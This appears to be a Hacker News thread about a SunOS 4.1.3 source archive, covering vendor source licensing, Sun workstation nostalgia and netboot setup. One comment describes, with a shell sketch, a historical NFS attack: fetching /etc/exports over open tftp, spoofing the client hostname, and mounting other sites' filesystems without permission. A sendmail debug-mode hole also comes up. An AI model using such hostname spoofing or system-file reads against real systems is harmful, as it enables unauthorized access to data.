> This is the SunOS 4.1.3 SUNSRC CD-ROM

which almost sounds like it was an officially distributed archive, somehow? I mean, I can't personally think of any reason for Sun to make a CD distribution of SunOS (was it called the OS/net gate yet?) for purely internal use, although maybe I'm just missing perspective, but https://github.com/Arquivotheca/SunOS-4.1.3/blob/413/Copyrig... looks to my very-non-lawyer eyes like all-rights-reserved, and 4.1.3 was well before OpenSolaris, so... a leak of some kind?
Edit: Looking at the copyright file again, it has a part number. Did Sun license SunOS? That certainly feels like it was meant for use outside of Sun, but it doesn't really explain why or how.
In the 1980s, it was common for vendors to offer source licenses to their customers, sometimes for an additional fee. DEC sold customers the OpenVMS sources (Compaq/HP continued the practice, and maybe VSI is keeping it up); IBM caused a lot of controversy in the early 1980s by announcing that they would stop giving customers source code access to MVS. Against that background, it's unsurprising to learn that Sun sold source licenses to their customers for SunOS as well.
I think Microsoft was a lot more restrictive with source licenses - generally only universities for research purposes (and the Windows Research Kernel was never the full OS anyway), some ISVs with specially negotiated deals, and some government agencies. The average customer couldn’t get access to the source code. Whereas with OpenVMS, for example, I think basically any licensee could order the source.
NT 3.5 and 4.0 on 4-processor (IIRC) and 8-processor machines had to be compiled from source on the target host, since the shipping kernel only supported 2 processors and cross-compilation wasn't an option. Fun times :)
IIRC you had to recompile the kernel and the HAL. I don't remember the details, but compiling on anything but the very machine targeted wasn't practical.
Sun licensed SunOS and Solaris source to pretty much anyone who asked (and wanted to pay for it)
All of the proprietary Unix vendors would sell source licenses to a greater or lesser extent. There are IRIX and AIX source trees out there if you go looking, licensed for university use back in the day.
Most of CE source was not particularly secret, it shipped on Platform Builder discs.
>Private Shared Source Code is an optional component of the Windows Embedded Compact 7 Platform Builder toolkit that can be installed during the setup process.
IIRC almost all Unixes followed the /usr/src model you really only see in BSD today. Sometimes it was a separate license, or only given to universities and third-party developers. But before Linux, it was assumed you could build the kernel and base userspace from source there, like you could with Bell Labs/AT&T.
The University/3rd party part was true even for Microsoft with NT and CE in the late 90s/early 00s. My little CS department got a CE dev kit with software, a device, and the source. I goofed around with it and was pretty quickly frustrated.
This also wanders into my memories of hating Sun version numbering and naming. SunOS grew SysV and became Solaris, but it was still SunOS. But it wasn’t. And then they anticipated the Java-ism of the minor version being generally accepted as the major, and conflictingly published materials both ways.
I feel bad for the devs where what they did made sense to them and then marketing took over. Naming and versioning are hard enough problems alone.
That is, after all, how UNIX spread after the UNIX 6th Edition Commentary book, and given how AT&T was forbidden to profit from their research results at Bell Labs.
Would you build your business on top of code you didn't have the source for?
We can get into the weeds with blackbox firmware and what not, but it's darn useful to be able to look at the OS code to figure things out when it's acting weird.
> but it's darn useful to be able to look at the OS code to figure things out when it's acting weird.
As the other sibling comment here notes, we did that even if we didn't have the source code; we just looked at the Asm instead. People like Andrew Schulman and Matt Pietrek made themselves famous by doing that.
If you can prove that a particular value never escapes the scope, it may be possible to allocate it on the stack instead, which also reduces the amount of garbage collection needed later.
If anyone wanted to keep a museum-piece Sun workstation running SunOS 4.x, but with security vulnerabilities patched, maybe this is one way.
For `sun4c` kernel architectures (most SPARCs before multiprocessing), I'd try to get the source for 4.1.4. At least some of the older Sun-3 might need an older version, and I recall our Sun-386i systems were stuck at 4.0.x.
I recently fired up my old Sun 3/80 to see if it would still boot. It wouldn't. The battery backed config RAM was dead. Of course I couldn't quit, could I? I was able to find a modern replacement for the chip, order it from Mouser, get it programmed correctly (after a few tries) and hey look, it started to boot.
Then, unsurprisingly, the old Quantum SCSI disk was only happy enough to make grinding noises and no more. I found a guy making SATA to SCSI adapters meant for these old Suns and paired that to an SSD I had lying around. Hey, look, that now works too.
Finally, by setting up tftp, bootp, and NFS on a FreeBSD VM I was able to net boot the machine and install SunOS 4. My goodness, I had forgotten how slow the thing is, and how much has changed since the 1990s. I was able to get a bunch of more modern stuff to compile, but it was a fight every time.
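For anyone curious, the FreeBSD side of a setup like that boils down to something like the sketch below. This is only an illustration, not my exact config: the client name "sun380", the MAC address, the IPs, and the export path are placeholders, and details vary by FreeBSD and SunOS release.

    # /etc/inetd.conf -- serve boot files over tftp and answer bootp requests
    tftp   dgram udp wait root /usr/libexec/tftpd  tftpd -l -s /tftpboot
    bootps dgram udp wait root /usr/libexec/bootpd bootpd

    # /etc/bootptab -- tell the Sun who it is and what to fetch
    sun380:ht=ether:ha=0800200a0b0c:ip=192.168.1.80:sm=255.255.255.0:\
        sa=192.168.1.10:bf=boot.sun3:rp=/export/sunos4:

    # /etc/exports -- export the install tree over NFS
    /export/sunos4 -maproot=root sun380

    # /etc/rc.conf -- turn the services on
    inetd_enable="YES"
    rpcbind_enable="YES"
    nfs_server_enable="YES"
    mountd_enable="YES"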
Next I was going to drag out the old SGI Indigo, but haven't found the energy yet.
Cool. A 3/80 with SunView and period SunView tools would be great.
I'd be curious if you find a trove of the random open source SunView software from that era. A later SunSite mirror still up is at http://sunsite.informatik.rwth-aachen.de/cgi-bin/ftp.new/ftp... Starting from a Usenet archive, to find the names and original FTP sites of software might help. (Especially programs circa 1990 with names ending in "Tool". There was even a ToolTool.)
There's also commercial software. FrameMaker and Interleaf at the time were arguably nicer than 2022 Microsoft Word, for example.
I ran into the same problem with a newer Sun model (Ultra 10.) I looked up the chip on ebay and almost ordered one, but wasn't in the mood for another project I'm going to lose interest in after a week. The drive was also incredibly loud on startup, so I'm concerned it may also be dead. (The last time I booted it was probably 2005, running Solaris 8!)
That is when I had my UNIX zealot phase, starting with Xenix, DG/UX, ..., but then I got to discover the parallel universe from Xerox PARC, and felt sad that UNIX had won.
Especially because many insist on using their systems as if UNIX V6 were released yesterday, NeXTSTEP and macOS being the exceptions, which isn't any surprise given how Steve Jobs looked at UNIX workstations.
The thing I do not understand is why people favour updated 1970s-style UNIX, e.g. Linux and xBSD, when more modern sophisticated later Unixes are right there for the taking, such as Plan 9 and Inferno.
My cynical suspicion is that it's because they are just too hard to understand. I know that I struggle with them myself. The conceptual model of '70s UNIX, and (to me) horrible primitive tools such as Vi, are easier to understand than the richer, smarter OSes of the '80s (Plan 9, with integrated networking, proper namespaces, and the whole LAN as your workstation) and '90s (Inferno, which also abstracts away CPU architectures and replaces C with something cleaner and safer).
Same. In the mid 90's, I had a Sparc 10 at home for a while, as my main system (I bought it from a software company that went under.) What I really miss is the incredible "variety" of hardware back then. I remember working at a company where we had DEC Alphas, VAXes, Suns, HPUX systems, AIX boxes... Today everything is basically homogeneous.
What is the difference between a commercial UNIX workstation and a Mac?
Genuinely asking, I've never used a commercial UNIX workstation like you're describing.
A mac is much better in almost every way, but that is no less than you would expect given 30+ years of evolution since the 80/90s.
The bit you’re maybe missing is how different the standard dev process was back then to accommodate how slow build infra was. You (or at least I) typically started compiling something and went for a coffee or whatever because it would take a l o n g time to build anything. So often teams would have a setup where each member had a low-power desktop that was basically just an x terminal and everyone would run their actual builds on a team buildserver. If you had a proper workstation it meant you could generally build your own code directly on your workstation meaning you weren’t contending for resources on the build server with everyone else. So I remember in one team back then one guy left who had a sparc 10 on his desk, so my buddy grabbed that, I swapped from my terrible lunchbox LX to nab my friend’s sparc 5 and suddenly local builds were a possibility for me, meaning a huge increase in productivity.
My experience of mid-80s / early-90s Sun workstations was of rugged VMEbus boxes that could take the vibration of planes, trains, 4-wheel drives, and heavy-dust environments (with easy blow-through to clean internal layouts), and the option of fully shielded boxes, cables and monitors just in case the odd lightning strike or EMP burst happened nearby.

Nice clean OSes .. with RISC ops that failed on misaligned data, which encouraged clean cache-aware coding styles and programs that pumped data through fast (or simply didn't work at all).

i.e. great dev boxes for cross-platform coding - get it right on a Sun and it worked well pretty much across the POSIX space.
Clean! Clean is the last thing I would call the commercial Unixen. I have a couple of SGI boxes and IRIX is pretty wild and weedy. I picked up a Sun box and had to replace Solaris with OpenBSD after a week. If curious, the straw that broke the camel's back was that the official way to change the hostname was to reinstall the OS; I found an unofficial way, but it was involved, to say the least.

The commercial distributions tended to collect cruft without ever throwing anything away (throwing things away may upset a paying customer that depended on the feature); Linux is a cleanroom by comparison. And, as a good BSDite, I consider Linux an almost unusable mess.
Solaris 10: run sys-unconfig, which resets your system back to scratch.
Compare that to OpenBSD... run hostname; if you want it to persist, go ahead and set /etc/myname.

But the main thing was I was not raised on Solaris; the system administration was foreign, the tooling sucked, the ports tree was miserable. I was probably going to run BSD anyway, but I had the hardware so might as well try Solaris... and now you want me to reset the system in order to fix a minor mistake in the hostname? One insult too many.
> Solaris 10: run sys-unconfig, which resets your system back to scratch.
Read the link for Solaris 10 I posted, there is literally a section titled:
2. Changing hostname without running sys-unconfig command
> But the main thing was I was not raised on Solaris ... and now you want me to reset the system in order to fix a minor mistake in the hostname?
Read the article, renaming the host without running sys-unconfig is trivial, and only requires a reboot. It is nowhere near as hard as you are making out.
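For reference, the manual rename on Solaris 10 boils down to updating a handful of files and rebooting. This is just a sketch: "newhost" and the hme0 interface name are placeholders, and the linked article is the authoritative list.

    echo newhost > /etc/nodename
    echo newhost > /etc/hostname.hme0   # one file per plumbed interface
    vi /etc/inet/hosts                  # update the entry for the machine's IP
    vi /etc/inet/ipnodes                # same entry again on Solaris 10
    vi /etc/net/ticlts/hosts /etc/net/ticots/hosts /etc/net/ticotsord/hosts
    reboot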
>DonHopkins, 4 months ago, on: NFS: The Early Years
NFS originally stood for "No File Security".
The NFS protocol wasn't just stateless, but also securityless!
Stewart, remember the open secret that almost everybody at Sun knew about, in which you could tftp a host's /etc/exports (because tftp was set up by default in a way that left it wide open to anyone from anywhere reading files in /etc) to learn the name of all the servers a host allowed to mount its file system, and then in a root shell simply go "hostname foo ; mount remote:/dir /mnt ; hostname `hostname`" to temporarily change the CLIENT's hostname to the name of a host that the SERVER allowed to mount the directory, then mount it (claiming to be an allowed client), then switch it back?
That's right, the server didn't bother checking the client's IP address against the host name it claimed to be in the NFS mountd request. That's right: the protocol itself let the client tell the server what its host name was, and the server implementation didn't check that against the client's ip address. Nice professional protocol design and implementation, huh?
Yes, that actually worked, because the NFS protocol laughably trusted the CLIENT to identify its host name for security purposes. That level of "trust" was built into the original NFS protocol and implementation from day one, by the geniuses at Sun who originally designed it. The network is the computer is insecure, indeed.
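Spelled out as a shell sketch (run as root on the attacking client; "victim" and "trusted-client" are placeholder names, and the exact tftp and mount syntax varied a bit between releases):

    # Fetch the server's exports list: tftpd shipped wide open, rooted at /,
    # so /etc/exports was readable by anyone on the net.
    tftp victim
      tftp> get /etc/exports
      tftp> quit
    cat exports                    # pick any client name the server trusts

    # Pretend to be that client just long enough to do the mount.
    OLD=`hostname`
    hostname trusted-client        # mountd trusts whatever name the client claims
    mount victim:/export/home /mnt # ...and never checks it against the IP address
    hostname $OLD                  # switch the name back; the mount stays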
And most engineers at Sun knew that (and many often took advantage of it). NFS security was a running joke, thus the moniker "No File Security". But Sun proudly shipped it to customers anyway, configured with terribly insecure defaults that let anybody on the internet mount your file system. (That "feature" was undocumented, of course.)
While I was a summer intern at Sun in 1987, somebody at Sun laughingly told me about it, explaining that was how everybody at Sun read each other's email. So I tried it out by using that technique to mount remote NFS directories from Rutgers, CMU, and UMD onto my workstation at Sun. It was slow but it worked just fine.
I told my friend Ron Natalie at Rutgers, who was Associate Director of CCIS at the time, that I was able to access his private file systems over the internet from Sun, and he rightfully freaked out, because as a huge Sun customer in charge of security, nobody at Sun had ever told him about how incredibly insecure NFS actually was before, despite all Sun's promises. (Technically I was probably violating the terms of my NDA with Sun by telling him that, but tough cookies.)
For all Sun's lip service about NFS and networks and computers and security, it was widely known internally at Sun that NFS had No File Security, which was why it was such a running inside joke that Sun knowingly shipped it to their customers with such flagrantly terrible defaults, but didn't care to tell anyone who followed their advice and used their software that they were leaving their file systems wide open.
Here is an old news-makers email from Ron from Interop88 that mentions mounting NFS directories over the internet -- by then after I'd told him about NFS's complete lack of security, so he'd probably slightly secured his own servers by overriding the tftp defaults by then, and was able to mount it because he remembered one of the host names in /etc/exports and didn't need to fetch it with tftp to discover it:
>From: Ron Natalie <elbereth.rutgers.edu!ron.rutgers.edu!ron@rutgers.edu> Date: Wed, Oct 5, 1988, 4:09 AM To: NeWS-makers@brillig.umd.edu
>I love a trade show that I can walk into almost any booth and get logged in at reasonable speed to my home machine. One neat experiment was that The Wollongong Group provided a Sun 3/60C for a public mail reading terminal. It was lacking a windowing system, so I decided to see if I could start up NeWS on it. In order to do that, I NFS mounted the /usr partition from a Rutgers machine and Symlinked /usr/NeWS to the appropriate directory. This worked amazingly well.
>(The guys from the Apple booth thought that NeWS was pretty neat, I showed them how to change the menus by just editing the user.ps file.)
>DonHopkins, Sept 28, 2019, on: A developer goes to a DevOps conference
>I love the incredibly vague job title "Member, Technical Staff" I had at Sun. It could cover anything from kernel hacking to HVAC repair!
>At least I had root access to my own workstation (and everybody else's in the company, thanks to the fact that NFS actually stood for No File Security).
>[In the late 80's and early 90's, NFSv2 clients could change their hostname to anything they wanted before doing a mount ("hostname foobar; mount server:/foobar /mnt ; hostname original"), and that name would be sent in the mount request, and the server trusted the name the client claimed to be without checking it against the ip address, then looked it up in /etc/exports, and happily returned a file handle.
>If the NFS server or any of its clients were on your local network, you could snoop file handles by putting your ethernet card into promiscuous mode.
>And of course NFS servers often ran TFTP servers by default (for booting diskless clients), so you could usually read an NFS server's /etc/exports file to find out what client hostnames it allowed, then change your hostname to one of those before mounting any remote file system you wanted from the NFS server.
>And yes, TFTP and NFS and this security hole you could drive the space shuttle through worked just fine over the internet, not just the local area network.]
Sun's track record on network security isn't exactly "stellar" and has "burned" a lot of people (pardon the terrible puns, which can't hold a candle to IBM's "Eclipse" pun). The other gaping security hole at Sun I reported was just after the Robert T Morris Worm incident, as I explained to Martha Zimet:
>Oh yeah, there was that one time I accidentally hacked sun.com’s sendmail server, the day after the Morris worm.
>The worm was getting in via sendmail’s DEBUG command, which was usually enabled by default.
>One of the first helpful responses that somebody emailed around was a suggestion for blocking the worm by editing your sendmail binary, searching for DEBUG, and replacing the D with a NULL character.
>Which the genius running sun.com apparently did.
>That had the effect of disabling the DEBUG command, but enabling the zero-length string command!
>So as I often did, I went “telnet sun.com 25” to EXPN some news-makers email addresses that had been bouncing, and first hit return a couple of times to flush the telnet negotiation characters it sends, so the second return put it in debug mode, and the EXPN returned a whole page full of diagnostic information I wasn’t expecting!
>I reported the problem to postmaster@sun.com and they were like “sorry oops”.
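For the curious, the kind of binary edit described above amounts to something like this (an illustration with modern tools; the actual patch back then would have been done with adb or a binary editor):

    # Overwrite the 'D' of the "DEBUG" string in the sendmail binary with a NUL.
    # That removes the DEBUG command from the command table, but -- as above --
    # leaves a zero-length command in its place.
    cp /usr/lib/sendmail sendmail.patched
    perl -pi -e 's/DEBUG/\x00EBUG/' sendmail.patched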
True that. I gave a demo of NeWS pie menus, emacs, and the HyperTIES browser and authoring tool to Steve Jobs once, and he jumped up and down and shouted "That sucks!" Overall I got about a 3:1 sucks to neat ratio.
It's the 30 year anniversary of CHI’88 (May 15–19, 1988), where Jack Callahan, Ben Shneiderman, Mark Weiser and I (Don Hopkins) presented our paper “An Empirical Comparison of Pie vs. Linear Menus”. We found pie menus to be about 15% faster and with a significantly lower error rate than linear menus! So I've written up a 30 year retrospective:
This article will discuss the history of what’s happened with pie menus over the last 30 years (and more), present both good and bad examples, including ideas half baked, experiments performed, problems discovered, solutions attempted, alternatives explored, progress made, software freed, products shipped, as well as setbacks and impediments to their widespread adoption.
Here is the main article, and some other related articles:
Pie Menus: A 30 Year Retrospective. By Don Hopkins, Ground Up Software, May 15, 2018. Take a Look and Feel Free!
Steve Jobs Thought Pie Menus Sucked “That sucks! That sucks! Wow, that’s neat! That sucks!”
On October 25, 1988, I gave Steve Jobs a demo of pie menus, NeWS, UniPress Emacs and HyperTIES at the Educom conference in Washington DC. His reaction was to jump up and down, point at the screen, and yell “That sucks! That sucks! Wow, that’s neat! That sucks!”
I tried explaining how we’d performed an experiment proving pie menus were faster than linear menus, but he insisted the linear menus in NeXT Step were the best possible menus ever.
But who was I to rain on his parade, two weeks after the first release of NeXT Step 0.8? (Up to that time, it was the most hyped piece of vaporware ever, and doubters were wearing t-shirts saying “NeVR Step”!) Even after he went back to Apple, Steve Jobs never took a bite of Apple Pie Menus, the forbidden fruit. There’s no accounting for taste!
I'm just about old enough to remember "oldschool" Unix workstations (I used Suns at uni in the early 90s, a bit, even though I wasn't supposed to unless I was doing Applied Maths). This is when Windows 3 was new and 3.1 was on the horizon, which was a graphical frontend for DOS with some fairly janky apps - Paint was probably the highlight - and Macs were on System 6 with System 7 bringing stuff like Switcher built-in so if you had enough RAM you could actually have two programs loaded at the same time! They didn't quite multitask but they could, kind of, if they were expecting to.
Using SunOS 4 at the time on machines with masses of RAM and disk space was a bit like how vans changed with the first-gen Ford Transit - it was quick and light and you didn't have to stretch halfway across the cab to get 1st gear. You could order one with a radio, and not only that but you could actually *hear* the radio at 70mph. And - it actually did 70mph!
Comparing the SPARCStations we had back then to a modern Mac running OSX is a bit like comparing those first-gen Transits to a nice modern Merc Sprinter. It's still basically the same thing but it's a lot quicker and cleaner and the stereo has bluetooth and everything's bigger and faster and it's a hell of a lot cheaper.
In the 80s and 90s, they were significantly faster and more capable than their PC / Mac analogues. Double or triple the speeds and feeds, ten times the price ;)
By the 2000s the advantages had more or less vanished and the workstation SKUs were discontinued one by one.
PC’s were stuck with awful hardware for a long time, but the Mac story is a bit more complicated — once they became available, higher-end 68020/68030 Macs were sometimes competitive with workstations.
No. Mac II's showed up in the late 80's just as the workstation vendors were moving off 68k hardware and onto SPARC and MIPS. PA and POWER came along a few years after that, then Alpha a bit later still. Motorola never got back in the game, really, though Intel caught up with the release of the P6 in 1995.
Absolutely yes! It depends on your model and use case... workstation fans often have this reaction, though. Please recall that performance is not one number. Someone/something has to write code in a language, invoke hardware well and efficiently, and return the results to a user or process. Drop-down menus meant that no way could the machine do math? Hardly true. Performance on benchmarks? Probably, as the others say, you will never win like a horse race. Overall, in the expanding world of digital signals, media and math? Yes. The Motorola chips had access to RAM if you could get enough of it. RAM plus math gets you a lot of places. Virtual memory is guaranteed RAM, but at what cost? All things considered, yes, the Motorola CPUs did bring something, and it was a highly competitive time.

Edit: right, add to that "digital audio signal processing". Virtual memory paging was horribly obvious for digital audio, and that means stereo audio albums and digital audio soundtracks for movies, which was (and is) Big Business. Lots of hard math problems for geeks, lots of sales for business types.
This is only considering part of the question, which makes it a false comparison.
Classic MacOS had pretty much the best UI on any mass-market computer ever made.
And that's the part that its users saw all day every day, and interacted with, and which made Macs desirable.
Not just the front-end of programs: this extended to how to install new programs, how to add drivers or other system components, how to add fonts; how to connect to printers; how to make or break drive connections to other machines; how to connect new drives, and how to remove them. All the daily tasks of running a computer.
But UNIX people, with their gods-awful UI, didn't care about this then and they don't care about it now. UNIX UIs are better than they were but they are still very poor.
The real problem is that all the visionary innovators got old and retired and their replacements don't have the overall vision and don't really understand how stuff works, so they randomly tweak things without understanding.
So Mac OS X's UI was never as good as Classic's, and it's been getting worse and worse for 10-15Y. Read John Siracusa's excellent in-depth reviews of Mac OS X on Ars Technica for details. The generally accepted high point was Snow Leopard, 10.6, and it's been downhill since.
Microsoft never had much of the plot, but what they had hit a high point around 1996, and it's been downhill since. Now, as in the last decade, Windows is a UI train wreck.
But still people bang on about largely irrelevant behind-the-scenes stuff, not understanding that it's the whole picture that matters: not just the UI, but not just the backend either.
The year after that I bought an Acorn Archimedes A310. 8MHz ARM2. It was 4x faster in raw single-threaded integer computation than the top-end 80386DX 25MHz with L1 cache that IBM sold, and that was a $10,000 PC.
It was about 10x quicker than your 16MHz machine... and it cost £800.
I see. I never considered that especially important then, and I don't now, but OK then. In that case, I submit the Acorn R140 workstation running RISC iX.
They were. The close integration of a fast RISC chip and a framebuffer meant astonishingly good graphics performance for the late 1980s. Bear in mind, this was before VESA local bus existed, before NeXTstep, anything like that.
With a 4 MIPS CPU in 1987, you didn't need a dedicated GPU for blazingly-fast graphics.
Mine predated the TIGA standard; it was an NEC card. I ported GNU binutils to it, then wrote some 34010 assembler functions for X11 to call to do basic 2D graphics operations.
In a typical academic or r&d lab setting they were very hacker friendly networked setups, where people would share scripts, installed software, and media. You could access files in each other's home directories from any machine (controlled by file permissions), automate things with cron jobs, someone would be administering the IRC server, the servers and workstations would be the same OS so people would naturally graduate to running a IRC or usenet server for the local users etc.
(Probably it could also be a much less fun scenario than a Mac, with power tripping sysadmins handicapping usage, non-technical users having problems or feeling excluded, etc)
These days, not much, but back then personal computers were a lot less powerful (and less expensive) than UNIX workstations. In terms of experience though - think tricked out Linux desktop but with working sound.
> In terms of experience though - think tricked out Linux desktop but with working sound.
I've spent some time thinking about this, mostly in terms of "why do I like Solaris more than GNU/Linux, even in 2022?". I think it really does boil down to it being 1. a single coherent system, 2. including running on hardware that was designed to run it, 3. with paid support by a company that actually has skin in the game to make the thing work. (And in my case a certain amount of rose-tinted glasses.) IMO, the Bazaar can build amazing things at probably-lower cost (certainly lower per-party) and it has a diversity that is good, but the Cathedral can, in fact, Get Stuff Done and build a more coherent system. And when you're successfully selling workstations at $10k+ a pop you can afford to do high quality engineering:)
I'm sure that's a factor but maybe the particular point in the technology development curve accounts for a lot of the perceived difference. There was a striking qualitative difference between a $2000 computer and a $20000 computer and if you had access to both, the latter felt like some sort of glimpse of the future like you got a ride in a prototype flying car.
A computer that is 10x more expensive than a high-end smartphone is not Indigo² better than a 386. That gap just happened to be a brief and memorable outlier.
> So, returning to the question upthread: how a Mac is not a commercial Unix workstation? It checks all the boxes you listed.
If I were attempting to answer that, I would say that Apple de-emphasizes and neglects the unix "powertool" side of the system. But I'm not actually sold on that angle; I actually half-typed and then deleted a comment arguing that Macs are precisely unix workstations - they run a Unix™ OS on mostly custom hardware that is, at least with the latest ARM chips, more powerful than much of the market and which commands a high price (although far less so than was traditional for unix workstations:]).
EDIT: Comment downthread says they're still getting certified as an official Unix, so I've updated this comment to reflect that.
Back when Apple was convincing people to transition to OS X, their website had areas that were strongly dedicated to people for whom a UNIX workstation might have made sense. I was working in life sciences back then and the workflow was Macs running Perkin Elmer gel machines and Solaris and Irix running the analysis. Apple pushed really hard to convince us that OS X was Real UNIX.
I dont have the wayback urls now but here is a relatively recent example of their marketing to the UNIX crowd, circa 2011.
It totally is. This was an explicit selling point when they originally announced the move to OS X. They bought a Unix workstation maker and were going to make macs that were also Unix workstations.
I was looking at the login [1] code and thinking "hah, surely it must be full of stack overflows", but no, it seems they were well aware of the pitfalls there. Not so much for the heap data, but oh well.
"These are the Version 6 sources for trek. They must be modernized before
trek will compile. Everything is under SCCS ready for some willing person
to come along. Documentation is in ./doc.
Kirk McKusick 3/25/83"
I don't know for sure because I can't find any information about SunOS licensing, but I think it goes something like,
> Oracle has acquired Sun Microsystems, Inc. ("Sun"), you acknowledge that in all cases where the reference is Sun, Oracle will fulfill these obligations as successor in interest to Sun.
About 20 years ago, Lenny DiCicco's resume came my way. He was interviewing for a Unix sys admin position. Having read Takedown, I recognized his name immediately. We didn't hire him. That's my Kevin Mitnick story.
It’s pretty cool to see that an entire OS can be built with a ~250 line Makefile. Yes, of course there are sub Makefiles etc, but perhaps it indicates that we could make today’s technology simpler (e.g. the Linux kernel).
If you only support a single platform and a single compiler, Makefiles are perfectly adequate. The extra baggage (autotools and such) is there for building on any platform, with different compilers.
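For instance, a single-platform Makefile in that old style stays tiny because nothing is probed or configured - the tools and flags are simply hard-coded. A minimal sketch (not taken from the SunOS tree; recipe lines are indented with tabs):

    CC=     cc
    CFLAGS= -O
    OBJS=   main.o util.o

    prog: $(OBJS)
            $(CC) $(CFLAGS) -o prog $(OBJS)

    clean:
            rm -f prog $(OBJS)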
This brings back memories! My first job out of school was with a mostly SunOS shop. After 8-bit micros and then the very first Macintoshes, plus the various oversubscribed machines they had at school, it felt so "big league"! Good times.
Probably some trains, planes and ships from the 90's. At least I remember Cory Doctorow describing airplanes as "flying Solaris boxen with badly-secured SCADA controllers" in his "The upcoming war on general purpose computation".
I watched that presentation earlier today. Interesting how he gave the presentation in 2011 right when smartphones were taking off. I feel like what he's talking about has in part already happened (somewhat) with smartphones, tablets, and chromebooks so ubiquitous now
I know a few places. The answer is, 100% of the time, "legacy code."
One of my former employers has millions of lines of code that just assume a bigendian architecture and play fast and loose with byte order as a result. They are probably not gonna port that code off SPARC any time soon. Eventually. But not soon.
He already got a couple DMCA takedowns however (WinNT5 and SCO UnixWare-7).
It's better for those interested to mirror (locally and offline) before it's too late.
I think it was a Usenix LISA conference once where Unix wonks were handing out "Mentally Contaminated" buttons to anyone who'd seen AT&T source code and, on the basis of that experience, wouldn't be allowed to work on a "free" codebase. One of the silly but meaningful battles in the Unix wars.
That is not correct, and most likely comes from the scary FUD of yesteryear between the GPL and anti-GPL crowds (e.g. Microsoft, who used to disallow people from looking at GPL'd code).
In reality, looking at this (or any other leaked or unlicensed code) "taints" you pretty much the same as looking at any other code, including -e.g.- GPL/MPL/Apache2, etc. code, but you don't see anyone[0] nowadays saying to not look at such code (it used to be a thing back when people were cluelessly afraid of the GPL, but that was decades ago).
The "taint" isn't inherent, it comes from the possibility that you'd rewrite code you've seen so that it is mostly identical and be sued for it (and if that is the case is something that will only be decided by a court). If anything, IIRC when GNU was making their Unix replacement utilities back in the day they recommended people to implement them in as different from Unix a way as they could, but they didn't forbid people who were "tainted" by Unix to contribute to GNU (which, if you think about it, makes perfect sense considering the people who would contribute to it were most likely already Unix programmers). This sort of remains in the current GNU Coding Standards[1]
In fact you are "tainted" the same way by read and/or participating in any codebase that isn't fully owned by yourself - but if that was an actual problem in practice, no programmer would be able to join another company unless what they did there had absolutely nothing to do with any of the companies they worked at previously as experienced programmers would actually be liabilities[2]. Meanwhile in reality programmers jump between companies all the time with their experience being seen as an asset.
[0] don't take that literally, i'm certain some people would recommend against reading GPL/MPL/etc code, but they'd be a very tiny minority - and almost certainly driven by the same old FUDs
[2] Yes, you can find anecdotes where that happened - John Carmack being sued by ZeniMax would be such a case - but those are very rare exceptions from litigious sue-happy companies and there are literally millions of professional programmers out there